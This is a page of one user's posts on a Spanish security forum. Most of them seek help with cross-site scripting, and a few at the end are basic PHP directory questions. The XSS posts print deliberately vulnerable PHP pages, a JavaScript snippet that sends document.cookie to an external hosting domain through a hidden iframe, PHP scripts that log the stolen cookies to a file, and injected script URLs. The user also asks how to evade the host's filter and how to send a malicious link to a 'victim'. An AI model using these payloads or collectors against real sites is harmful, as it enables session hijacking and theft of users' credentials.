elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


  Mostrar Mensajes
Páginas: 1 2 [3] 4 5
21  Seguridad Informática / Nivel Web / Re: Problema con añadimiento en codigo en: 29 Julio 2010, 06:20 am
no pasa por que el hosting sea malo, solo tiene un pequeño filtro que quiero saber como evadirlo :)

igual gracias por la respuesta :)
22  Seguridad Informática / Nivel Web / Problema con añadimiento en codigo en: 29 Julio 2010, 04:42 am
Hola gente miren estaba montando un servidor de pruebas y lo subi a mi@

los codigos son los siguientes:

webv.php

Código:
<?php
session_start();
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Bienvenidos a XSS testing</title>
</head>
   
<body><center>
<h1><font color=red>XSS Testing</font></h1></center>
<div align=center>
<form method="post" action="busca.php" >
<input type="text" name="busca" value="Buscador Vulnerable" maxlength="222">
<input type="submit" value="buscar">
</form>
</div>
<br><br><br>
<form method="post" action="pag2.php">
<font color=red>Ingrese su usuario:    <input type="text" name="nombre">
<br>
Ingrese su contraseña: </font><input type="password" name="password">
<br>
<input type="submit" value="enviar">
</form>
</body>
</html>

busca.php

Código:
<?php
$bus = $_REQUEST['busca'];

echo ($bus);
?>

pag2.php

Código:
<?php
$user=$_POST['nombre'];
$pass = $_POST['password'];
if ($user == "franco"  && $pass == "franco")
{
setcookie("senia", $user."-". $pass, time()+60*60*24*365, "/");
echo "Bienvenido $user";
}
else
{
echo "usuario o contraseña incorrcto:";
}
?>

cookie.js

Código:
document.write("<iframe width='0' height='0' src='http://www.pruebas18p.webcindario.com/cookie.php?c="+document.cookie+"'></iframe>");

cookie.php

Código:
<?php
$cookie=$_GET['c'];
$file=fopen('archivo.txt', 'a');
fwrite($file, $cookie.' - ');
fclose($file);
?>

esta es la url vulnerable a nivel localhost:

http://localhost/busca.php?busca=<script src="http://localhost/cookie.js"</script>

El codigo que interpretaria busca.php seria <script src="http://Http://localhost/cookie.js"</script>

pero mi@ es el siguiente

Código:
<script src=\"http://www.pruebas18p.webcindario.com/cookie.js\"</script>
<!-- Inserted by miarroba -->
<script type="text/javascript" src="http://weborama.miarroba.info/?d=hosting&amp;h=pruebas18p.webcindario.com&amp;t=1280371273&amp;k=5c4e108c6ef14544954ee758c7790aa0"></script>
<!-- Inserted by miarroba -->



Bueno a nivel localhost no hay problema, puedo obtener tranquilamente las cookies, pero en mi arroba no se puede ejecutar el script

alguien sabe alguna forma de bypassear ese filtro que tiene mi arroba ?

gracias :)
23  Seguridad Informática / Nivel Web / Re: duda xss en: 25 Julio 2010, 21:22 pm
sisi :) utilizo mozilla 3.6  miren me quede toda la noche ayer y logre obtener una fucking cookie..

les dejo los codigos :)

Código:
<?php
if(isset($_COOKIE['user'])) echo $_COOKIE['user'];
?>
<html>
<head>
</head>
<body>
<form method="post" action="buscador.php">
<input name="palabrita" type="text">
<br>
<input type="submit" value="enviar"></form>
<a
onclick="document.location='http://localhost/lalsa.php?cookie='+escape(document.cookie);" href="#"> Click here for details</a>
</body>
</html>


buscador.php
Código:
<?php
$user = $_REQUEST['palabrita'];
setcookie("user", $user, time()+(60*60*24*365),"/");
echo $user;
?>
<html>
<head></head>
<body>
<a href="pindex.php"> Pagina 1</a>

lasla.php

Código:

<?php
$cookie = $_GET['cookie'];
$archivo ="datos.txt";
$f = fopen($archivo,"w");
fputs($f, $cookie);
fclose ($f);
?>



el problema es el siguiente, yo quiero mandar una url a la victima y que sus cookies de esa pagina vulnerable se envien a mi, pero no se que url "maliciosa" mandar... me entienden ?

ya que si mando estO:

Código:
<script><a
onclick="document.location='http://localhost/lalsa.php?cookie='+escape(document.cookie);" href="#"> Volver a la pagina</a></script>

me guarda en la cookie lo siguiente:

Código:
token=8c610b4ae58115e366123efd8e7b7accd7ba525a2207acc6; u=fra; c=a1305ca10f94f2340770c73e26d427588f236709; user=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Flocalhost%2Flalsa.php%3Fcookie%3D%27 escape%28document.cookie%29%3B%3C%2Fscript%3E;

y ahi no me esta guardando ningun usuario solo lo que puse acontinuacion de la variable palabrita :s
muchas gracias
24  Seguridad Informática / Nivel Web / Re: duda xss en: 25 Julio 2010, 07:56 am
sigue sin salirme, sinceramente no se que estoy haciendo mal :S  :-[
25  Seguridad Informática / Nivel Web / Re: duda xss en: 24 Julio 2010, 19:51 pm
es que no se que estoy haciendo mal -.-"
26  Seguridad Informática / Nivel Web / duda xss en: 24 Julio 2010, 08:55 am
Hola gente del foro, estaba en casa intentando practicar xss leyendo tutoriales, pero no me sale :S

miren hize unas paginas vulnerables, pero me sigue sin salir:

pagina: pindex.php

Código:
<?php
if(isset($_COOKIE['user'])) echo $_COOKIE['user'];
?>
<html>
<head>
</head>
<body>
<form method="post" action="buscador.php">
<input type="text" name="palabrita">
<br>
<input type="submit" value="enviar"></form>
</body>
</html>

buscador.php

Código:
<?php
$user = $_REQUEST['palabrita'];
setcookie("user", $user, time()+(60*60*24*365),"/");
?>
<html>
<head></head>
<body>
<a href="indexxx.php"> Pagina 1</a>
</body>
</html>

cookies.php

Código:
<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a");
fwrite($fff, $cookie);
fclose($fff);
?>

y esta es la url que mando:

Código:
http://localhost/buscador.php?palabrita=
<script>window.location='http://localhost/cookies.php?cookie='+document.cookie;</script>&enviar=;

el problema es que no me crea el archivo archivo.txt :S

alguien sabe a que se debe.. ? gracias
27  Programación / PHP / Re: duda con directorios en: 23 Julio 2010, 02:18 am
ya se que es esa la diferencia y ademas comprendi la diferencia ( que es lo mas importante creo yo)

pero eso solo provocaba el error ?
28  Programación / PHP / Re: duda con directorios en: 23 Julio 2010, 01:32 am
Muchas gracias yoya, pero no entiendo por que en el primer codigo que puse no sucedia eso :s

saludos
29  Programación / PHP / Re: duda con directorios en: 22 Julio 2010, 22:52 pm
entonces, en primer lugar estaria leyendo mal los directorios ya que seria asi ?

Código
  1. <?
  2. if($direc = opendir("./")) {
  3. echo "Directorio actual";
  4. echo $direc;
  5. echo "<br>";
  6. echo "Archivos: \n";
  7. while (FALSE !==($arc = readdir($direc))) 
  8. {
  9. // mi pregunta es si aca podria agregar la funcion filemtime.. eso no me termina de //quedar claro ya que si la agrego me provoca un error :s
  10.  
  11. //gracias
  12. echo $arc;
  13. echo "<br>";
  14. }
  15. closedir($direc);
  16. ?>
30  Programación / PHP / Re: duda con directorios en: 22 Julio 2010, 17:59 pm
tienes alguna documentacion ? :s
no encuentro nada, mejor dicho siempre encuentro lo mismo y lo que leo no sirve :S

gracias
Páginas: 1 2 [3] 4 5
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines